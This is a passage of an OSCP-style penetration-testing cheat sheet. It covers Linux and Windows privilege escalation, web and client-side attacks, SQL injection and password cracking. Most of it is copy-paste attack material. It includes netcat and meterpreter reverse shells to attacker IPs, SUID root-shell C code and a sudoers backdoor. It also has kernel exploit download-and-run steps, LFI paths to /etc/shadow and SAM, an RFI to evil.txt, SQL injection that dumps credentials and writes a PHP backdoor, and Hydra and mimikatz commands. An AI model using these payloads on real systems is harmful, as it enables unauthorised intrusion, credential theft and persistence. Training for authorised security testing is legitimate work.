1302 | find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it.
1303 | find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID
1304 | for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done
1305 | find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
1306 |
1307 | What folders are world writeable?:
1308 |
1309 | find / -writable -type d 2>/dev/null # world-writeable folders
1310 | find / -perm -222 -type d 2>/dev/null # world-writeable folders
1311 | find / -perm -o w -type d 2>/dev/null # world-writeable folders
1312 | find / -perm -o x -type d 2>/dev/null # world-executable folders
1313 | find / \( -perm -o w -perm -o x \) -type d 2>/dev/null # world-writeable & executable folders
1314 |
1315 | - There are a few scripts that can automate the linux enumeration process:
1316 |
1317 | - Google is my favorite Linux Kernel exploitation search tool. Many of these automated checkers are missing important kernel exploits which can create a very frustrating blindspot during your OSCP course.
1318 |
1319 | - LinuxPrivChecker.py - My favorite automated linux priv enumeration checker -
1320 |
1321 | [https://www.securitysift.com/download/linuxprivchecker.py](https://www.securitysift.com/download/linuxprivchecker.py)
1322 |
1323 | - LinEnum - (Recently Updated)
1324 |
1325 | [https://github.com/rebootuser/LinEnum](https://github.com/rebootuser/LinEnum)
1326 |
1327 | - linux-exploit-suggester (Recently Updated)
1328 |
1329 | [https://github.com/mzet-/linux-exploit-suggester](https://github.com/mzet-/linux-exploit-suggester)
1330 |
1331 | - Highon.coffee Linux Local Enum - Great enumeration script!
1332 |
1333 | `wget https://highon.coffee/downloads/linux-local-enum.sh`
1334 |
1335 | - Linux Privilege Exploit Suggester (Old has not been updated in years)
1336 |
1337 | [https://github.com/PenturaLabs/Linux\_Exploit\_Suggester](https://github.com/PenturaLabs/Linux_Exploit_Suggester)
1338 |
1339 | - Linux post exploitation enumeration and exploit checking tools
1340 |
1341 | [https://github.com/reider-roque/linpostexp](https://github.com/reider-roque/linpostexp)
1342 |
1343 |
1344 | Handy Kernel Exploits
1345 |
1346 | - CVE-2010-2959 - 'CAN BCM' Privilege Escalation - Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32)
1347 |
1348 | [https://www.exploit-db.com/exploits/14814/](https://www.exploit-db.com/exploits/14814/)
1349 |
1350 | wget -O i-can-haz-modharden.c http://www.exploit-db.com/download/14814
1351 | $ gcc i-can-haz-modharden.c -o i-can-haz-modharden
1352 | $ ./i-can-haz-modharden
1353 | [+] launching root shell!
1354 | # id
1355 | uid=0(root) gid=0(root)
1356 |
1357 | - CVE-2010-3904 - Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8
1358 | [https://www.exploit-db.com/exploits/15285/](https://www.exploit-db.com/exploits/15285/)
1359 |
1360 | - CVE-2012-0056 - Mempodipper - Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64)
1361 | [https://git.zx2c4.com/CVE-2012-0056/about/](https://git.zx2c4.com/CVE-2012-0056/about/)
1362 | Linux CVE 2012-0056
1363 |
1364 | wget -O exploit.c http://www.exploit-db.com/download/18411
1365 | gcc -o mempodipper exploit.c
1366 | ./mempodipper
1367 |
1368 | - CVE-2016-5195 - Dirty Cow - Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8
1369 | [https://dirtycow.ninja/](https://dirtycow.ninja/)
1370 | First existed on 2.6.22 (released in 2007) and was fixed on Oct 18, 2016
1371 |
1372 | - Run a command as a user other than root
1373 |
1374 | sudo -u haxzor /usr/bin/vim /etc/apache2/sites-available/000-default.conf
1375 |
1376 | - Add a user or change a password
1377 |
1378 | /usr/sbin/useradd -p 'openssl passwd -1 thePassword' haxzor
1379 | echo thePassword | passwd haxzor --stdin
1380 |
1381 | - Local Privilege Escalation Exploit in Linux
1382 |
1383 | - **SUID** (**S**et owner **U**ser **ID** up on execution)
1384 | Often SUID C binary files are required to spawn a shell as a
1385 | superuser, you can update the UID / GID and shell as required.
1386 |
1387 | below are some quick copy and paste examples for various
1388 | shells:
1389 |
1390 | SUID C Shell for /bin/bash
1391 |
1392 | int main(void){
1393 | setresuid(0, 0, 0);
1394 | system("/bin/bash");
1395 | }
1396 |
1397 | SUID C Shell for /bin/sh
1398 |
1399 | int main(void){
1400 | setresuid(0, 0, 0);
1401 | system("/bin/sh");
1402 | }
1403 |
1404 | Building the SUID Shell binary
1405 | gcc -o suid suid.c
1406 | For 32 bit:
1407 | gcc -m32 -o suid suid.c
1408 |
1409 | - Create and compile an SUID from a limited shell (no file transfer)
1410 |
1411 | echo "int main(void){\nsetgid(0);\nsetuid(0);\nsystem(\"/bin/sh\");\n}" >privsc.c
1412 | gcc privsc.c -o privsc
1413 |
1414 | - Handy command if you can get a root user to run it. Add the www-data user to Root SUDO group with no password requirement:
1415 |
1416 | `echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update`
1417 |
1418 | - You may find a command is being executed by the root user, you may be able to modify the system PATH environment variable
1419 | to execute your command instead. In the example below, ssh is replaced with a reverse shell SUID connecting to 10.10.10.1 on
1420 | port 4444.
1421 |
1422 | set PATH="/tmp:/usr/local/bin:/usr/bin:/bin"
1423 | echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.1 4444 >/tmp/f" >> /tmp/ssh
1424 | chmod +x ssh
1425 |
1426 | - SearchSploit
1427 |
1428 | searchsploit –uncsearchsploit apache 2.2
1429 | searchsploit "Linux Kernel"
1430 | searchsploit linux 2.6 | grep -i ubuntu | grep local
1431 | searchsploit slmail
1432 |
1433 | - Kernel Exploit Suggestions for Kernel Version 3.0.0
1434 |
1435 | `./usr/share/linux-exploit-suggester/Linux_Exploit_Suggester.pl -k 3.0.0`
1436 |
1437 | - Precompiled Linux Kernel Exploits - ***Super handy if GCC is not installed on the target machine!***
1438 |
1439 | [*https://www.kernel-exploits.com/*](https://www.kernel-exploits.com/)
1440 |
1441 | - Collect root password
1442 |
1443 | `cat /etc/shadow |grep root`
1444 |
1445 | - Find and display the proof.txt or flag.txt - LOOT!
1446 |
1447 | cat `find / -name proof.txt -print`
1448 |
1449 | - Windows Privilege Escalation
1450 | --------------------------------------------------------------------------------------------------------------------------
1451 |
1452 | - Windows Privilege Escalation resource
1453 | http://www.fuzzysecurity.com/tutorials/16.html
1454 |
1455 | - Try the getsystem command using meterpreter - rarely works but is worth a try.
1456 |
1457 | `meterpreter > getsystem`
1458 |
1459 | - Metasploit Meterpreter Privilege Escalation Guide
1460 | https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/
1461 |
1462 | - Windows Server 2003 and IIS 6.0 WEBDAV Exploiting
1463 | http://www.r00tsec.com/2011/09/exploiting-microsoft-iis-version-60.html
1464 |
1465 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=443 -f asp > aspshell.txt
1466 |
1467 | cadavar http://$ip
1468 | dav:/> put aspshell.txt
1469 | Uploading aspshell.txt to `/aspshell.txt':
1470 | Progress: [=============================>] 100.0% of 38468 bytes succeeded.
1471 | dav:/> copy aspshell.txt aspshell3.asp;.txt
1472 | Copying `/aspshell3.txt' to `/aspshell3.asp%3b.txt': succeeded.
1473 | dav:/> exit
1474 |
1475 | msf > use exploit/multi/handler
1476 | msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
1477 | msf exploit(handler) > set LHOST 1.2.3.4
1478 | msf exploit(handler) > set LPORT 80
1479 | msf exploit(handler) > set ExitOnSession false
1480 | msf exploit(handler) > exploit -j
1481 |
1482 | curl http://$ip/aspshell3.asp;.txt
1483 |
1484 | [*] Started reverse TCP handler on 1.2.3.4:443
1485 | [*] Starting the payload handler...
1486 | [*] Sending stage (957487 bytes) to 1.2.3.5
1487 | [*] Meterpreter session 1 opened (1.2.3.4:443 -> 1.2.3.5:1063) at 2017-09-25 13:10:55 -0700
1488 |
1489 | - Windows privledge escalation exploits are often written in Python. So, it is necessary to compile the using pyinstaller.py into an executable and upload them to the remote server.
1490 |
1491 | pip install pyinstaller
1492 | wget -O exploit.py http://www.exploit-db.com/download/31853
1493 | python pyinstaller.py --onefile exploit.py
1494 |
1495 | - Windows Server 2003 and IIS 6.0 privledge escalation using impersonation:
1496 |
1497 | https://www.exploit-db.com/exploits/6705/
1498 |
1499 | https://github.com/Re4son/Churrasco
1500 |
1501 | c:\Inetpub>churrasco
1502 | churrasco
1503 | /churrasco/-->Usage: Churrasco.exe [-d] "command to run"
1504 |
1505 | c:\Inetpub>churrasco -d "net user /add "
1506 | c:\Inetpub>churrasco -d "net localgroup administrators /add"
1507 | c:\Inetpub>churrasco -d "NET LOCALGROUP "Remote Desktop Users" /ADD"
1508 |
1509 | - Windows MS11-080 - http://www.exploit-db.com/exploits/18176/
1510 |
1511 | python pyinstaller.py --onefile ms11-080.py
1512 | mx11-080.exe -O XP
1513 |
1514 | - Powershell Exploits - You may find that some Windows privledge escalation exploits are written in Powershell. You may not have an interactive shell that allows you to enter the powershell prompt. Once the powershell script is uploaded to the server, here is a quick one liner to run a powershell command from a basic (cmd.exe) shell:
1515 |
1516 | MS16-032 https://www.exploit-db.com/exploits/39719/
1517 |
1518 | `powershell -ExecutionPolicy ByPass -command "& { . C:\Users\Public\Invoke-MS16-032.ps1; Invoke-MS16-032 }"`
1519 |
1520 |
1521 | - Powershell Priv Escalation Tools
1522 | https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
1523 |
1524 | - Windows Run As - Switching users in linux is trival with the `SU` command. However, an equivalent command does not exist in Windows. Here are 3 ways to run a command as a different user in Windows.
1525 |
1526 | - Sysinternals psexec is a handy tool for running a command on a remote or local server as a specific user, given you have thier username and password. The following example creates a reverse shell from a windows server to our Kali box using netcat for Windows and Psexec (on a 64 bit system).
1527 |
1528 | C:\>psexec64 \\COMPUTERNAME -u Test -p test -h "c:\users\public\nc.exe -nc 192.168.1.10 4444 -e cmd.exe"
1529 |
1530 | PsExec v2.2 - Execute processes remotely
1531 | Copyright (C) 2001-2016 Mark Russinovich
1532 | Sysinternals - www.sysinternals.com
1533 |
1534 | - Runas.exe is a handy windows tool that allows you to run a program as another user so long as you know thier password. The following example creates a reverse shell from a windows server to our Kali box using netcat for Windows and Runas.exe:
1535 |
1536 | C:\>C:\Windows\System32\runas.exe /env /noprofile /user:Test "c:\users\public\nc.exe -nc 192.168.1.10 4444 -e cmd.exe"
1537 | Enter the password for Test:
1538 | Attempting to start nc.exe as user "COMPUTERNAME\Test" ...
1539 |
1540 | - PowerShell can also be used to launch a process as another user. The following simple powershell script will run a reverse shell as the specified username and password.
1541 |
1542 | $username = ''
1543 | $password = ''
1544 | $securePassword = ConvertTo-SecureString $password -AsPlainText -Force
1545 | $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
1546 | Start-Process -FilePath C:\Users\Public\nc.exe -NoNewWindow -Credential $credential -ArgumentList ("-nc","192.168.1.10","4444","-e","cmd.exe") -WorkingDirectory C:\Users\Public
1547 |
1548 | Next run this script using powershell.exe:
1549 |
1550 | `powershell -ExecutionPolicy ByPass -command "& { . C:\Users\public\PowerShellRunAs.ps1; }"`
1551 |
1552 |
1553 | - Windows Service Configuration Viewer - Check for misconfigurations
1554 | in services that can lead to privilege escalation. You can replace
1555 | the executable with your own and have windows execute whatever code
1556 | you want as the privileged user.
1557 | icacls scsiaccess.exe
1558 |
1559 | scsiaccess.exe
1560 | NT AUTHORITY\SYSTEM:(I)(F)
1561 | BUILTIN\Administrators:(I)(F)
1562 | BUILTIN\Users:(I)(RX)
1563 | APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
1564 | Everyone:(I)(F)
1565 |
1566 | - Compile a custom add user command in windows using C
1567 |
1568 | root@kali:~\# cat useradd.c
1569 | #include /* system, NULL, EXIT_FAILURE */
1570 | int main ()
1571 | {
1572 | int i;
1573 | i=system ("net localgroup administrators low /add");
1574 | return 0;
1575 | }
1576 |
1577 | i686-w64-mingw32-gcc -o scsiaccess.exe useradd.c
1578 |
1579 | - Group Policy Preferences (GPP)
1580 | A common useful misconfiguration found in modern domain environments
1581 | is unprotected Windows GPP settings files
1582 |
1583 | - map the Domain controller SYSVOL share
1584 |
1585 | `net use z:\\dc01\SYSVOL`
1586 |
1587 | - Find the GPP file: Groups.xml
1588 |
1589 | `dir /s Groups.xml`
1590 |
1591 | - Review the contents for passwords
1592 |
1593 | `type Groups.xml`
1594 |
1595 | - Decrypt using GPP Decrypt
1596 |
1597 | `gpp-decrypt riBZpPtHOGtVk+SdLOmJ6xiNgFH6Gp45BoP3I6AnPgZ1IfxtgI67qqZfgh78kBZB`
1598 |
1599 | - Find and display the proof.txt or flag.txt - get the loot!
1600 |
1601 | `#meterpreter > run post/windows/gather/win_privs`
1602 | `cd\ & dir /b /s proof.txt`
1603 | `type c:\pathto\proof.txt`
1604 |
1605 |
1606 | Client, Web and Password Attacks
1607 | ==============================================================================================================================
1608 |
1609 | - Client Attacks
1610 | ------------------------------------------------------------------------------------------------------------
1611 |
1612 | - MS12-037- Internet Explorer 8 Fixed Col Span ID
1613 | wget -O exploit.html
1614 |
1615 | service apache2 start
1616 |
1617 | - JAVA Signed Jar client side attack
1618 | echo '' >
1621 | /var/www/html/java.html
1622 | User must hit run on the popup that occurs.
1623 |
1624 | - Linux Client Shells
1625 | [*http://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/*](http://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/)
1626 |
1627 | - Setting up the Client Side Exploit
1628 |
1629 | - Swapping Out the Shellcode
1630 |
1631 | - Injecting a Backdoor Shell into Plink.exe
1632 | backdoor-factory -f /usr/share/windows-binaries/plink.exe -H $ip
1633 | -P 4444 -s reverse\_shell\_tcp
1634 |
1635 | - Web Attacks
1636 | ---------------------------------------------------------------------------------------------------------
1637 |
1638 | - Web Shag Web Application Vulnerability Assessment Platform
1639 | webshag-gui
1640 |
1641 | - Web Shells
1642 | [*http://tools.kali.org/maintaining-access/webshells*](http://tools.kali.org/maintaining-access/webshells)
1643 | ls -l /usr/share/webshells/
1644 |
1645 | - Generate a PHP backdoor (generate) protected with the given
1646 | password (s3cr3t)
1647 | weevely generate s3cr3t
1648 | weevely http://$ip/weevely.php s3cr3t
1649 |
1650 | - Java Signed Applet Attack
1651 |
1652 | - HTTP / HTTPS Webserver Enumeration
1653 |
1654 | - OWASP Dirbuster
1655 |
1656 | - nikto -h $ip
1657 |
1658 | - Essential Iceweasel Add-ons
1659 | Cookies Manager
1660 | https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/
1661 | Tamper Data
1662 | https://addons.mozilla.org/en-US/firefox/addon/tamper-data/
1663 |
1664 | - Cross Site Scripting (XSS)
1665 | significant impacts, such as cookie stealing and authentication
1666 | bypass, redirecting the victim’s browser to a malicious HTML
1667 | page, and more
1668 |
1669 | - Browser Redirection and IFRAME Injection
1670 |
1672 |
1673 | - Stealing Cookies and Session Information
1674 |
1678 | nc -nlvp 80
1679 |
1680 | - File Inclusion Vulnerabilities
1681 | -----------------------------------------------------------------------------------------------------------------------------
1682 |
1683 | - Local (LFI) and remote (RFI) file inclusion vulnerabilities are
1684 | commonly found in poorly written PHP code.
1685 |
1686 | - fimap - There is a Python tool called fimap which can be
1687 | leveraged to automate the exploitation of LFI/RFI
1688 | vulnerabilities that are found in PHP (sqlmap for LFI):
1689 | [*https://github.com/kurobeats/fimap*](https://github.com/kurobeats/fimap)
1690 |
1691 | - Gaining a shell from phpinfo()
1692 | fimap + phpinfo() Exploit - If a phpinfo() file is present,
1693 | it’s usually possible to get a shell, if you don’t know the
1694 | location of the phpinfo file fimap can probe for it, or you
1695 | could use a tool like OWASP DirBuster.
1696 |
1697 | - For Local File Inclusions look for the include() function in PHP
1698 | code.
1699 | include("lang/".$\_COOKIE\['lang'\]);
1700 | include($\_GET\['page'\].".php");
1701 |
1702 | - LFI - Encode and Decode a file using base64
1703 | curl -s
1704 | http://$ip/?page=php://filter/convert.base64-encode/resource=index
1705 | | grep -e '\[^\\ \]\\{40,\\}' | base64 -d
1706 |
1707 | - LFI - Download file with base 64 encoding
1708 | [*http://$ip/index.php?page=php://filter/convert.base64-encode/resource=admin.php*](about:blank)
1709 |
1710 | - LFI Linux Files:
1711 | /etc/issue
1712 | /proc/version
1713 | /etc/profile
1714 | /etc/passwd
1715 | /etc/passwd
1716 | /etc/shadow
1717 | /root/.bash\_history
1718 | /var/log/dmessage
1719 | /var/mail/root
1720 | /var/spool/cron/crontabs/root
1721 |
1722 | - LFI Windows Files:
1723 | %SYSTEMROOT%\\repair\\system
1724 | %SYSTEMROOT%\\repair\\SAM
1725 | %SYSTEMROOT%\\repair\\SAM
1726 | %WINDIR%\\win.ini
1727 | %SYSTEMDRIVE%\\boot.ini
1728 | %WINDIR%\\Panther\\sysprep.inf
1729 | %WINDIR%\\system32\\config\\AppEvent.Evt
1730 |
1731 | - LFI OSX Files:
1732 | /etc/fstab
1733 | /etc/master.passwd
1734 | /etc/resolv.conf
1735 | /etc/sudoers
1736 | /etc/sysctl.conf
1737 |
1738 | - LFI - Download passwords file
1739 | [*http://$ip/index.php?page=/etc/passwd*](about:blank)
1740 | [*http://$ip/index.php?file=../../../../etc/passwd*](about:blank)
1741 |
1742 | - LFI - Download passwords file with filter evasion
1743 | [*http://$ip/index.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd*](about:blank)
1744 |
1745 | - Local File Inclusion - In versions of PHP below 5.3 we can
1746 | terminate with null byte
1747 | GET
1748 | /addguestbook.php?name=Haxor&comment=Merci!&LANG=../../../../../../../windows/system32/drivers/etc/hosts%00
1749 |
1750 | - Contaminating Log Files ``
1751 |
1752 | - For a Remote File Inclusion look for php code that is not sanitized and passed to the PHP include function and the php.ini
1753 | file must be configured to allow remote files
1754 |
1755 | */etc/php5/cgi/php.ini* - "allow_url_fopen" and "allow_url_include" both set to "on"
1756 |
1757 | `include($_REQUEST["file"].".php");`
1758 |
1759 | - Remote File Inclusion
1760 |
1761 | `http://192.168.11.35/addguestbook.php?name=a&comment=b&LANG=http://192.168.10.5/evil.txt `
1762 |
1763 | ``
1764 |
1765 | - Database Vulnerabilities
1766 | ----------------------------------------------------------------------------------------------------------------------
1767 |
1768 | - Grab password hashes from a web application mysql database called “Users” - once you have the MySQL root username and password
1769 |
1770 | mysql -u root -p -h $ip
1771 | use "Users"
1772 | show tables;
1773 | select \* from users;
1774 |
1775 | - Authentication Bypass
1776 |
1777 | name='wronguser' or 1=1;
1778 | name='wronguser' or 1=1 LIMIT 1;
1779 |
1780 | - Enumerating the Database
1781 |
1782 | `http://192.168.11.35/comment.php?id=738)'`
1783 |
1784 | Verbose error message?
1785 |
1786 | `http://$ip/comment.php?id=738 order by 1`
1787 |
1788 | `http://$ip/comment.php?id=738 union all select 1,2,3,4,5,6 `
1789 |
1790 | Determine MySQL Version:
1791 |
1792 | `http://$ip/comment.php?id=738 union all select 1,2,3,4,@@version,6 `
1793 |
1794 | Current user being used for the database connection:
1795 |
1796 | `http://$ip/comment.php?id=738 union all select 1,2,3,4,user(),6 `
1797 |
1798 | Enumerate database tables and column structures
1799 |
1800 | `http://$ip/comment.php?id=738 union all select 1,2,3,4,table_name,6 FROM information_schema.tables `
1801 |
1802 | Target the users table in the database
1803 |
1804 | `http://$ip/comment.php?id=738 union all select 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='users' `
1805 |
1806 | Extract the name and password
1807 |
1808 | `http://$ip/comment.php?id=738 union select 1,2,3,4,concat(name,0x3a, password),6 FROM users `
1809 |
1810 | Create a backdoor
1811 |
1812 | `http://$ip/comment.php?id=738 union all select 1,2,3,4,"",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'`
1813 |
1814 |
1815 | - **SQLMap Examples**
1816 |
1817 | - Crawl the links
1818 |
1819 | `sqlmap -u http://$ip --crawl=1`
1820 |
1821 | `sqlmap -u http://meh.com --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3`
1822 |
1823 |
1824 | - SQLMap Search for databases against a suspected GET SQL Injection
1825 |
1826 | `sqlmap –u http://$ip/blog/index.php?search –dbs`
1827 |
1828 | - SQLMap dump tables from database oscommerce at GET SQL injection
1829 |
1830 | `sqlmap –u http://$ip/blog/index.php?search= –dbs –D oscommerce –tables –dumps `
1831 |
1832 | - SQLMap GET Parameter command
1833 |
1834 | `sqlmap -u http://$ip/comment.php?id=738 --dbms=mysql --dump -threads=5 `
1835 |
1836 | - SQLMap Post Username parameter
1837 |
1838 | `sqlmap -u http://$ip/login.php --method=POST --data="usermail=asc@dsd.com&password=1231" -p "usermail" --risk=3 --level=5 --dbms=MySQL --dump-all`
1839 |
1840 | - SQL Map OS Shell
1841 |
1842 | `sqlmap -u http://$ip/comment.php?id=738 --dbms=mysql --osshell `
1843 |
1844 | `sqlmap -u http://$ip/login.php --method=POST --data="usermail=asc@dsd.com&password=1231" -p "usermail" --risk=3 --level=5 --dbms=MySQL --os-shell`
1845 |
1846 | - Automated sqlmap scan
1847 |
1848 | `sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read="/var/www/blah.php"`
1849 |
1850 | - Targeted sqlmap scan
1851 |
1852 | `sqlmap -u "http://meh.com/meh.php?id=1" --dbms=mysql --tech=U --random-agent --dump`
1853 |
1854 | - Scan url for union + error based injection with mysql backend and use a random user agent + database dump
1855 |
1856 | `sqlmap -o -u http://$ip/index.php --forms --dbs `
1857 |
1858 | `sqlmap -o -u "http://$ip/form/" --forms`
1859 |
1860 | - Sqlmap check form for injection
1861 |
1862 | `sqlmap -o -u "http://$ip/vuln-form" --forms -D database-name -T users --dump`
1863 |
1864 | - Enumerate databases
1865 |
1866 | `sqlmap --dbms=mysql -u "$URL" --dbs`
1867 |
1868 | - Enumerate tables from a specific database
1869 |
1870 | `sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tables `
1871 |
1872 | - Dump table data from a specific database and table
1873 |
1874 | `sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump `
1875 |
1876 | - Specify parameter to exploit
1877 |
1878 | `sqlmap --dbms=mysql -u "http://www.example.com/param1=value1¶m2=value2" --dbs -p param2 `
1879 |
1880 | - Specify parameter to exploit in 'nice' URIs (exploits param1)
1881 |
1882 | `sqlmap --dbms=mysql -u "http://www.example.com/param1/value1*/param2/value2" --dbs `
1883 |
1884 | - Get OS shell
1885 |
1886 | `sqlmap --dbms=mysql -u "$URL" --os-shell`
1887 |
1888 | - Get SQL shell
1889 |
1890 | `sqlmap --dbms=mysql -u "$URL" --sql-shell`
1891 |
1892 | - SQL query
1893 |
1894 | `sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --sql-query "SELECT * FROM $TABLE;"`
1895 |
1896 | - Use Tor Socks5 proxy
1897 |
1898 | `sqlmap --tor --tor-type=SOCKS5 --check-tor --dbms=mysql -u "$URL" --dbs`
1899 |
1900 |
1901 | - **NoSQLMap Examples**
1902 | You may encounter NoSQL instances like MongoDB in your OSCP journies (`/cgi-bin/mongo/2.2.3/dbparse.py`). NoSQLMap can help you to automate NoSQLDatabase enumeration.
1903 |
1904 | - NoSQLMap Installation
1905 |
1906 | git clone https://github.com/codingo/NoSQLMap.git
1907 | cd NoSQLMap/
1908 | ls
1909 | pip install couchdb
1910 | pip install pbkdf2
1911 | pip install ipcalc
1912 | python nosqlmap.py --help
1913 |
1914 | - Password Attacks
1915 | --------------------------------------------------------------------------------------------------------------
1916 |
1917 | - AES Decryption
1918 | http://aesencryption.net/
1919 |
1920 | - Convert multiple webpages into a word list
1921 | for x in 'index' 'about' 'post' 'contact' ; do curl
1922 | http://$ip/$x.html | html2markdown | tr -s ' ' '\\n' >>
1923 | webapp.txt ; done
1924 |
1925 | - Or convert html to word list dict
1926 | html2dic index.html.out | sort -u > index-html.dict
1927 |
1928 | - Default Usernames and Passwords
1929 |
1930 | - CIRT
1931 | [*http://www.cirt.net/passwords*](http://www.cirt.net/passwords)
1932 |
1933 | - Government Security - Default Logins and Passwords for
1934 | Networked Devices
1935 |
1936 | - [*http://www.governmentsecurity.org/articles/DefaultLoginsandPasswordsforNetworkedDevices.php*](http://www.governmentsecurity.org/articles/DefaultLoginsandPasswordsforNetworkedDevices.php)
1937 |
1938 | - Virus.org
1939 | [*http://www.virus.org/default-password/*](http://www.virus.org/default-password/)
1940 |
1941 | - Default Password
1942 | [*http://www.defaultpassword.com/*](http://www.defaultpassword.com/)
1943 |
1944 | - Brute Force
1945 |
1946 | - Nmap Brute forcing Scripts
1947 | [*https://nmap.org/nsedoc/categories/brute.html*](https://nmap.org/nsedoc/categories/brute.html)
1948 |
1949 | - Nmap Generic auto detect brute force attack
1950 | nmap --script brute -Pn
1951 |
1952 |
1953 | - MySQL nmap brute force attack
1954 | nmap --script=mysql-brute $ip
1955 |
1956 | - Dictionary Files
1957 |
1958 | - Word lists on Kali
1959 | cd /usr/share/wordlists
1960 |
1961 | - Key-space Brute Force
1962 |
1963 | - crunch 6 6 0123456789ABCDEF -o crunch1.txt
1964 |
1965 | - crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha
1966 |
1967 | - crunch 8 8 -t ,@@^^%%%
1968 |
1969 | - Pwdump and Fgdump - Security Accounts Manager (SAM)
1970 |
1971 | - pwdump.exe - attempts to extract password hashes
1972 |
1973 | - fgdump.exe - attempts to kill local antiviruses before
1974 | attempting to dump the password hashes and
1975 | cached credentials.
1976 |
1977 | - Windows Credential Editor (WCE)
1978 |
1979 | - allows one to perform several attacks to obtain clear text
1980 | passwords and hashes
1981 |
1982 | - wce -w
1983 |
1984 | - Mimikatz
1985 |
1986 | - extract plaintexts passwords, hash, PIN code and kerberos
1987 | tickets from memory. mimikatz can also perform
1988 | pass-the-hash, pass-the-ticket or build Golden tickets
1989 | [*https://github.com/gentilkiwi/mimikatz*](https://github.com/gentilkiwi/mimikatz)
1990 | From metasploit meterpreter (must have System level access):
1991 | `meterpreter> load mimikatz
1992 | meterpreter> help mimikatz
1993 | meterpreter> msv
1994 | meterpreter> kerberos
1995 | meterpreter> mimikatz_command -f samdump::hashes
1996 | meterpreter> mimikatz_command -f sekurlsa::searchPasswords`
1997 |
1998 | - Password Profiling
1999 |
2000 | - cewl can generate a password list from a web page
2001 | `cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt`
2002 |
2003 | - Password Mutating
2004 |
2005 | - John the ripper can mutate password lists
2006 | nano /etc/john/john.conf
2007 | `john --wordlist=megacorp-cewl.txt --rules --stdout > mutated.txt`
2008 |
2009 | - Medusa
2010 |
2011 | - Medusa, initiated against an htaccess protected web
2012 | directory
2013 | `medusa -h $ip -u admin -P password-file.txt -M http -m DIR:/admin -T 10`
2014 |
2015 | - Ncrack
2016 |
2017 | - ncrack (from the makers of nmap) can brute force RDP
2018 | `ncrack -vv --user offsec -P password-file.txt rdp://$ip`
2019 |
2020 | - Hydra
2021 |
2022 | - Hydra brute force against SNMP
2023 | `hydra -P password-file.txt -v $ip snmp`
2024 |
2025 | - Hydra FTP known user and password list
2026 | `hydra -t 1 -l admin -P /root/Desktop/password.lst -vV $ip ftp`
2027 |
2028 | - Hydra SSH using list of users and passwords
2029 | `hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh`
2030 |
2031 | - Hydra SSH using a known password and a username list
2032 | `hydra -v -V -u -L users.txt -p "" -t 1 -u $ip ssh`
2033 |
2034 | - Hydra SSH Against Known username on port 22
2035 | `hydra $ip -s 22 ssh -l -P big\_wordlist.txt`
2036 |
2037 | - Hydra POP3 Brute Force
2038 | `hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f $ip pop3 -V`
2039 |
2040 | - Hydra SMTP Brute Force
2041 | `hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V`
2042 |
2043 | - Hydra attack http get 401 login with a dictionary
2044 | `hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin`
2045 |
2046 | - Hydra attack Windows Remote Desktop with rockyou
2047 | `hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip`
2048 |
2049 | - Hydra brute force a Wordpress admin login
2050 | `hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'`
2051 |
2052 |
2053 |
2054 | - Password Hash Attacks
2055 | -------------------------------------------------------------------------------------------------------------------
2056 |
2057 | - Online Password Cracking
2058 | [*https://crackstation.net/*](https://crackstation.net/)
2059 |
2060 | - Hashcat
2061 | Needed to install new drivers to get my GPU Cracking to work on the Kali linux VM and I also had to use the --force parameter.
2062 | apt-get install libhwloc-dev ocl-icd-dev ocl-icd-opencl-dev
2063 | and
2064 | apt-get install pocl-opencl-icd
2065 |
2066 | Cracking Linux Hashes - /etc/shadow file
2067 | ```
2068 | 500 | md5crypt $1$, MD5(Unix) | Operating-Systems
2069 | 3200 | bcrypt $2*$, Blowfish(Unix) | Operating-Systems
2070 | 7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems
2071 | 1800 | sha512crypt $6$, SHA512(Unix) | Operating-Systems
2072 | ```
2073 | Cracking Windows Hashes
2074 | ```
2075 | 3000 | LM | Operating-Systems
2076 | 1000 | NTLM | Operating-Systems
2077 | ```
2078 | Cracking Common Application Hashes
2079 | ```
2080 | 900 | MD4 | Raw Hash
2081 | 0 | MD5 | Raw Hash
2082 | 5100 | Half MD5 | Raw Hash
2083 | 100 | SHA1 | Raw Hash
2084 | 10800 | SHA-384 | Raw Hash
